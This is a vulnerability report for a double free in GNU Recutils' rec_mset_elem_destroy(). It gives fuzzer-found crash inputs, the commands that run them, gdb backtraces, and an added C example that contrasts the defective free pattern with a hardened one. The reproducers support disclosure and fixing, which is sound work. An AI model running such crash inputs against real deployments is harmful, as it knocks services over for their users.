CVE-2021-46022: Use After Free in rec_mset_elem_destroy() at rec-mset.c:83

A Use-After-Free vulnerability in rec_mset_elem_destroy() at rec-mset.c of GNU Recutils v1.8.90 can lead to a segmentation fault or application crash.


# Use After Free in rec_mset_elem_destroy() at rec-mset.c:83

## Description

A Use After Free was discovered in rec_mset_elem_destroy() at rec-mset.c:83. The vulnerability causes a segmentation fault and application crash.

**version**

ea03fdaf84860488e6aa09f40cfbaeca8c02fb03

```
./recsel --version
recsel (GNU recutils) 1.8.90

Copyright © 2010-2020 Jose E. Marchesi.
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by Jose E. Marchesi.

```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz
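The backtraces below all end in the same place: a container's destroy routine walks its elements, hands each element's payload to a dispose callback, and `free()` is reached a second time for memory that was already released. The following is an added example, not recutils code; the `mset`/`elem` names and the allocation tracker are hypothetical and constructed here only to show the failure shape and a hardened version of it. The tracker stands in for the checks glibc (the "double free detected in tcache 2" message above) or AddressSanitizer perform, so the defective path reports the double free instead of aborting.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed allocation tracker: records live pointers so a second free of the
 * same pointer is counted rather than forwarded to free(), which would abort. */
#define MAX_LIVE 64
static void *live[MAX_LIVE];
static size_t live_count;
static int double_free_count;

static void *tracked_malloc(size_t n) {
    void *p = malloc(n);
    if (p && live_count < MAX_LIVE) live[live_count++] = p;
    return p;
}

static void tracked_free(void *p) {
    for (size_t i = 0; i < live_count; i++) {
        if (live[i] == p) {
            live[i] = live[--live_count];  /* swap-remove, then really free */
            free(p);
            return;
        }
    }
    double_free_count++;  /* pointer not live: a double or invalid free */
}

static void tracker_reset(void) { live_count = 0; double_free_count = 0; }

/* Hypothetical element container (not rec_mset): each element carries a payload
 * and a dispose callback, mirroring the destroy loop in the backtraces. */
typedef void (*dispose_fn)(void *);

struct elem {
    void *data;
    dispose_fn dispose;
    int owns_data;   /* hardened version: exactly one element owns a payload */
};

struct mset {
    struct elem *elems[8];
    size_t count;
};

static void payload_dispose(void *data) { tracked_free(data); }

static struct elem *elem_new(void *data, int owns) {
    struct elem *e = tracked_malloc(sizeof *e);
    e->data = data;
    e->dispose = payload_dispose;
    e->owns_data = owns;
    return e;
}

static void mset_append(struct mset *m, struct elem *e) { m->elems[m->count++] = e; }

/* Defective shape: every element disposes its payload unconditionally, so two
 * elements referencing the same payload free it twice. */
static void mset_destroy_unsafe(struct mset *m) {
    for (size_t i = 0; i < m->count; i++) {
        m->elems[i]->dispose(m->elems[i]->data);
        tracked_free(m->elems[i]);
    }
    m->count = 0;
}

/* Hardened shape: ownership is explicit, non-owning references never free, and
 * released pointers are cleared so a later use is a NULL deref, not a UAF. */
static void mset_destroy_safe(struct mset *m) {
    for (size_t i = 0; i < m->count; i++) {
        struct elem *e = m->elems[i];
        if (e->owns_data && e->data) e->dispose(e->data);
        e->data = NULL;
        tracked_free(e);
        m->elems[i] = NULL;
    }
    m->count = 0;
}

/* Builds a set in which two elements reference one payload (constructed input),
 * destroys it with the chosen routine and returns the double frees observed. */
static int run_scenario(int hardened) {
    tracker_reset();
    struct mset m = {0};
    char *payload = tracked_malloc(16);
    strcpy(payload, "shared");
    mset_append(&m, elem_new(payload, 1));   /* owner */
    mset_append(&m, elem_new(payload, 0));   /* alias to the same payload */
    if (hardened) mset_destroy_safe(&m); else mset_destroy_unsafe(&m);
    return double_free_count;
}

static size_t live_allocations(void) { return live_count; }

int main(void) {
    printf("unsafe destroy: %d double free(s)\n", run_scenario(0));
    printf("safe destroy:   %d double free(s), %zu leaked\n",
           run_scenario(1), live_allocations());
    return 0;
}
```

The same check the tracker performs here is what `-fsanitize=address` gives for free when triaging a crash like the ones below: rebuild the target with it and the report names both the freeing and the previously-freeing stack, which is more useful than glibc's tcache message or a bare SIGSEGV inside `free`.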

## Proof of Concept

### poc1

**poc**

```
base64 poc
```

**command:**

```
./recsel ./poc
```

**Result**

```
./recsel ./poc
free(): double free detected in tcache 2
[1] 663457 abort ./recsel ./poc
```

**gdb**

```
free(): double free detected in tcache 2

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at …/sysdeps/unix/sysv/linux/raise.c:50
50 …/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────
RAX 0x0
RBX 0x7ffff7aa1880 ◂— 0x7ffff7aa1880
RCX 0x7ffff7d5a18b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108]
RDX 0x0
RDI 0x2
RSI 0x7fffffffdb40 ◂— 0x0
R8 0x0
R9 0x7fffffffdb40 ◂— 0x0
R10 0x8
R11 0x246
R12 0x7fffffffddb0 ◂— 0x0
R13 0x10
R14 0x7ffff7ffb000 ◂— 0x6565726600001000
R15 0x1
RBP 0x7fffffffde90 —▸ 0x7ffff7effb80 (main_arena) ◂— 0x0
RSP 0x7fffffffdb40 ◂— 0x0
RIP 0x7ffff7d5a18b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108]
─────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────
► 0x7ffff7d5a18b <raise+203> mov rax, qword ptr [rsp + 0x108]
0x7ffff7d5a193 <raise+211> xor rax, qword ptr fs:[0x28]
0x7ffff7d5a19c <raise+220> jne raise+260 <raise+260>

0x7ffff7d5a1c4 <raise+260> call __stack_chk_fail <__stack_chk_fail>

0x7ffff7d5a1c9 nop dword ptr [rax]
0x7ffff7d5a1d0 <killpg> endbr64
0x7ffff7d5a1d4 <killpg+4> test edi, edi
0x7ffff7d5a1d6 <killpg+6> js killpg+16 <killpg+16>

0x7ffff7d5a1d8 <killpg+8> neg edi
0x7ffff7d5a1da <killpg+10> jmp kill <kill>

0x7ffff7d5a1df <killpg+15> nop
─────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsi r9 rsp 0x7fffffffdb40 ◂— 0x0
01:0008│ 0x7fffffffdb48 —▸ 0x7ffff7fe0187 ◂— mov r8, rax
02:0010│ 0x7fffffffdb50 ◂— 0x1
03:0018│ 0x7fffffffdb58 ◂— 0x0
04:0020│ 0x7fffffffdb60 ◂— 0x0
05:0028│ 0x7fffffffdb68 —▸ 0x7ffff7f09638 ◂— 0xe001200000416
06:0030│ 0x7fffffffdb70 —▸ 0x7fffffffdf10 —▸ 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
07:0038│ 0x7fffffffdb78 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax
───────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
► f 0 0x7ffff7d5a18b raise+203
f 1 0x7ffff7d39859 abort+299
f 2 0x7ffff7da43ee __libc_message+670
f 3 0x7ffff7dac47c
f 4 0x7ffff7dae0ed _int_free+1837
f 5 0x7ffff7f17db6 rec_mset_elem_destroy+38
f 6 0x7ffff7f2c01b gl_array_list_free+59
f 7 0x7ffff7f17e23 rec_mset_destroy+67
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 __GI_raise (sig=sig@entry=6) at …/sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7d39859 in __GI_abort () at abort.c:79
#2 0x00007ffff7da43ee in __libc_message (action="" fmt=fmt@entry=0x7ffff7ece285 "%s\n") at …/sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7dac47c in malloc_printerr (str=str@entry=0x7ffff7ed05d0 “free(): double free detected in tcache 2”) at malloc.c:5347
#4 0x00007ffff7dae0ed in _int_free (av=0x7ffff7effb80 <main_arena>, p=0x5555555829a0, have_lock=0) at malloc.c:4201
#5 0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x5555555835a0) at rec-mset.c:83
#6 0x00007ffff7f2c01b in gl_array_list_free (list=0x5555555823c0) at gl_array_list.c:433
#7 0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at …/lib/gl_list.h:799
#8 rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#9 rec_mset_destroy (mset=0x55555557e700) at rec-mset.c:233
#10 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x55555557e950) at rec-rset.c:1024
#11 rec_rset_destroy (rset=0x55555557e950) at rec-rset.c:994
#12 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579f00, rset=rset@entry=0x7fffffffe010) at rec-parser.c:979
#13 0x0000555555559663 in recutl_parse_db_from_file (in=in@entry=0x5555555772a0, file_name=file_name@entry=0x7fffffffe4ec "/home/aidai/fuzzing/recutils/fuckresults/fucksel/__GI_raise-__GI_abort/id:000011,sig:06,src:000002,op:ext_AO,pos:112", db=db@entry=0x555555579b60) at recutl.c:238
#14 0x0000555555559816 in recutl_build_db (argc=2, argv=0x7fffffffe1e8) at recutl.c:320
#15 0x0000555555558f76 in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1e8) at recsel.c:429
#16 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558f40 <main>, argc=2, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at …/csu/libc-start.c:308
#17 0x0000555555558fce in _start () at recsel.c:441
```

### poc2

**poc**

```
base64 poc
I/8h
```

**command:**

```
./recsel ./poc
```

**Result**

```
./recsel ./poc
[1] 44350 segmentation fault ./recsel ./poc
```

**gdb**

```
Program received signal SIGSEGV, Segmentation fault.
__GI___libc_free (mem=0x6d) at malloc.c:3102
3102 malloc.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
RAX 0x0
RBX 0x1
RCX 0x3
RDX 0x2
RDI 0x6d
RSI 0x55555557a1a0 —▸ 0x55555557a180 —▸ 0x55555557a160 ◂— 0x0
R8 0x2
R9 0x7c
R10 0x7ffff7f0bef6 ◂— 'rec_comment_destroy'
R11 0x7ffff7f196c0 (rec_comment_destroy) ◂— endbr64
R12 0x55555557a110 —▸ 0x7ffff7f5d2e0 (gl_array_list_implementation) —▸ 0x7ffff7f2c040 (gl_array_nx_create_empty) ◂— endbr64
R13 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
R14 0x7fffffffe020 ◂— 0x4
R15 0x6d
RBP 0x55555557b410 ◂— 0x2
RSP 0x7fffffffdf20 ◂— 0x1
RIP 0x7ffff7db1870 (free+32) ◂— mov rax, qword ptr [rdi - 8]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
► 0x7ffff7db1870 <free+32> mov rax, qword ptr [rdi - 8]
0x7ffff7db1874 <free+36> lea rsi, [rdi - 0x10]
0x7ffff7db1878 <free+40> test al, 2
0x7ffff7db187a <free+42> jne free+96 <free+96>

0x7ffff7db18b0 <free+96> mov edx, dword ptr [rip + 0x14d9fe] <0x7ffff7eff2b4>
0x7ffff7db18b6 <free+102> test edx, edx
0x7ffff7db18b8 <free+104> jne free+123 <free+123>

0x7ffff7db18cb <free+123> mov rdi, rsi
0x7ffff7db18ce <free+126> add rsp, 0x18
0x7ffff7db18d2 <free+130> jmp munmap_chunk <munmap_chunk>

0x7ffff7dac630 <munmap_chunk> sub rsp, 8
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffdf20 ◂— 0x1
01:0008│ 0x7fffffffdf28 —▸ 0x7ffff7fb2530 —▸ 0x7ffff7f06000 ◂— 0x10102464c457f
02:0010│ 0x7fffffffdf30 ◂— 0x1b3
03:0018│ 0x7fffffffdf38 —▸ 0x7ffff7f17db6 (rec_mset_elem_destroy+38) ◂— mov rdi, rbp
04:0020│ 0x7fffffffdf40 —▸ 0x55555557b448 ◂— 0x0
05:0028│ 0x7fffffffdf48 —▸ 0x7ffff7f2c01b (gl_array_list_free+59) ◂— sub rbx, 1
06:0030│ 0x7fffffffdf50 —▸ 0x55555557a030 ◂— 0x3
07:0038│ 0x7fffffffdf58 ◂— 0x3
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
► f 0 0x7ffff7db1870 free+32
f 1 0x7ffff7f17db6 rec_mset_elem_destroy+38
f 2 0x7ffff7f2c01b gl_array_list_free+59
f 3 0x7ffff7f17e23 rec_mset_destroy+67
f 4 0x7ffff7f17e23 rec_mset_destroy+67
f 5 0x7ffff7f17e23 rec_mset_destroy+67
f 6 0x7ffff7f1b781 rec_rset_destroy+113
f 7 0x7ffff7f1b781 rec_rset_destroy+113
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 __GI___libc_free (mem=0x6d) at malloc.c:3102
#1 0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x55555557b410) at rec-mset.c:83
#2 0x00007ffff7f2c01b in gl_array_list_free (list=0x55555557a110) at gl_array_list.c:433
#3 0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at …/lib/gl_list.h:799
#4 rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#5 rec_mset_destroy (mset=0x55555557a030) at rec-mset.c:233
#6 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x555555579fd0) at rec-rset.c:1024
#7 rec_rset_destroy (rset=0x555555579fd0) at rec-rset.c:994
#8 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579f00, rset=rset@entry=0x7fffffffe020) at rec-parser.c:979
#9 0x0000555555559663 in recutl_parse_db_from_file (in=in@entry=0x5555555772a0, file_name=file_name@entry=0x7fffffffe4f4 "…/…/fuckresults/fucksel/__GI___libc_free-rec_mset_elem_destroy/id:000000,sig:11,src:000001,op:havoc,rep:32", db=db@entry=0x555555579b60) at recutl.c:238
#10 0x0000555555559816 in recutl_build_db (argc=2, argv=0x7fffffffe1f8) at recutl.c:320
#11 0x0000555555558f76 in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1f8) at recsel.c:429
#12 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558f40 <main>, argc=2, argv=0x7fffffffe1f8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1e8) at …/csu/libc-start.c:308
#13 0x0000555555558fce in _start () at recsel.c:441
```

### poc3

**poc**

```
base64 poc
```

**command:**

```
./recinf ./poc
```

**Result**

```
./recinf ./poc
double free or corruption (fasttop)
[1] 3557061 abort ./recinf ./poc
```

**gdb**

```
double free or corruption (fasttop)

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at …/sysdeps/unix/sysv/linux/raise.c:50
50 …/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────
RAX 0x0
RBX 0x7ffff7aa1880 ◂— 0x7ffff7aa1880
RCX 0x7ffff7d5a18b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108]
RDX 0x0
RDI 0x2
RSI 0x7fffffffdb60 ◂— 0x0
R8 0x0
R9 0x7fffffffdb60 ◂— 0x0
R10 0x8
R11 0x246
R12 0x7fffffffddd0 ◂— 0x0
R13 0x10
R14 0x7ffff7ffb000 ◂— 0x62756f6400001000
R15 0x1
RBP 0x7fffffffdeb0 —▸ 0x7ffff7effb80 (main_arena) ◂— 0x0
RSP 0x7fffffffdb60 ◂— 0x0
RIP 0x7ffff7d5a18b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108]
─────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────
► 0x7ffff7d5a18b <raise+203> mov rax, qword ptr [rsp + 0x108]
0x7ffff7d5a193 <raise+211> xor rax, qword ptr fs:[0x28]
0x7ffff7d5a19c <raise+220> jne raise+260 <raise+260>

0x7ffff7d5a1c4 <raise+260> call __stack_chk_fail <__stack_chk_fail>

0x7ffff7d5a1c9 nop dword ptr [rax]
0x7ffff7d5a1d0 <killpg> endbr64
0x7ffff7d5a1d4 <killpg+4> test edi, edi
0x7ffff7d5a1d6 <killpg+6> js killpg+16 <killpg+16>

0x7ffff7d5a1d8 <killpg+8> neg edi
0x7ffff7d5a1da <killpg+10> jmp kill <kill>

0x7ffff7d5a1df <killpg+15> nop
─────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsi r9 rsp 0x7fffffffdb60 ◂— 0x0
01:0008│ 0x7fffffffdb68 —▸ 0x7ffff7f09638 ◂— 0xe001200000416
02:0010│ 0x7fffffffdb70 —▸ 0x7fffffffdf30 —▸ 0x7ffff7f17dd0 (rec_mset_elem_dispose_fn) ◂— endbr64
03:0018│ 0x7fffffffdb78 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax
04:0020│ 0x7fffffffdb80 —▸ 0x7ffff7f1aff0 (rec_rset_comment_disp_fn) ◂— endbr64
05:0028│ 0x7fffffffdb88 ◂— 0x1
06:0030│ 0x7fffffffdb90 ◂— 0x2
07:0038│ 0x7fffffffdb98 ◂— 0x0
───────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
► f 0 0x7ffff7d5a18b raise+203
f 1 0x7ffff7d39859 abort+299
f 2 0x7ffff7da43ee __libc_message+670
f 3 0x7ffff7dac47c
f 4 0x7ffff7dadde5 _int_free+1061
f 5 0x7ffff7f17db6 rec_mset_elem_destroy+38
f 6 0x7ffff7f2c01b gl_array_list_free+59
f 7 0x7ffff7f17e23 rec_mset_destroy+67
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0 __GI_raise (sig=sig@entry=6) at …/sysdeps/unix/sysv/linux/raise.c:50
#1 0x00007ffff7d39859 in __GI_abort () at abort.c:79
#2 0x00007ffff7da43ee in __libc_message (action="" fmt=fmt@entry=0x7ffff7ece285 "%s\n") at …/sysdeps/posix/libc_fatal.c:155
#3 0x00007ffff7dac47c in malloc_printerr (str=str@entry=0x7ffff7ed0628 "double free or corruption (fasttop)") at malloc.c:5347
#4 0x00007ffff7dadde5 in _int_free (av=0x7ffff7effb80 <main_arena>, p=0x555555581a30, have_lock=0) at malloc.c:4266
#5 0x00007ffff7f17db6 in rec_mset_elem_destroy (elem=0x555555581f70) at rec-mset.c:83
#6 0x00007ffff7f2c01b in gl_array_list_free (list=0x55555557d420) at gl_array_list.c:433
#7 0x00007ffff7f17e23 in gl_list_free (list=<optimized out>) at …/lib/gl_list.h:799
#8 rec_mset_destroy (mset=<optimized out>) at rec-mset.c:241
#9 rec_mset_destroy (mset=0x55555557d340) at rec-mset.c:233
#10 0x00007ffff7f1b781 in rec_rset_destroy (rset=0x55555557d2e0) at rec-rset.c:1024
#11 rec_rset_destroy (rset=0x55555557d2e0) at rec-rset.c:994
#12 0x00007ffff7f1fc3d in rec_parse_rset (parser=parser@entry=0x555555579b60, rset=rset@entry=0x7fffffffe030) at rec-parser.c:979
#13 0x00007ffff7f1fcf6 in rec_parse_db (parser=0x555555579b60, db=0x7fffffffe080) at rec-parser.c:1001
#14 0x000055555555a05a in print_info_file (in=<optimized out>, file_name=0x7fffffffe4ec "/home/aidai/fuzzing/recutils/fuckresults/fuckinf/__GI_raise-__GI_abort/id:000012,sig:06,src:000002,op:ext_AO,pos:500") at recinf.c:125
#15 0x0000555555558f3c in main (argc=argc@entry=2, argv=argv@entry=0x7fffffffe1e8) at recinf.c:239
#16 0x00007ffff7d3b0b3 in __libc_start_main (main=0x555555558e20 <main>, argc=2, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at …/csu/libc-start.c:308
#17 0x0000555555558fde in _start () at recinf.c:234
```
